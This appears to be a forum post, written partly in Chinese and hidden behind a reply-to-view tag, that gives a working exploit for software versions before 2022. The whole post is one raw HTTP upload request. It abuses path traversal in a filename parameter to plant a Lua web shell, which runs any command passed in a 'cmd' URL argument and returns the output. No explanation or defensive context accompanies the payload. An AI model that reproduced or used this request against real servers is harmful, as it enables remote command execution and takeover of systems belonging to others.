[rihide]涉及版本 2022年之前
POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456 78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1 Host: xxxxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 323 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox Q Referer: xxxxx Accept-Encoding: gzip ------WebKitFormBoundaryLx7ATxHThfk91oxQ Content-Disposition: form-data; name="file"; filename="flash.php" Content-Type: application/xxxx if ngx.req.get_uri_args().cmd then cmd = ngx.req.get_uri_args().cmd local t = io.popen(cmd) local a = t:read("*all") ngx.say(a) end------WebKitFormBoundaryLx7ATxHThfk91oxQ--
[/rihide]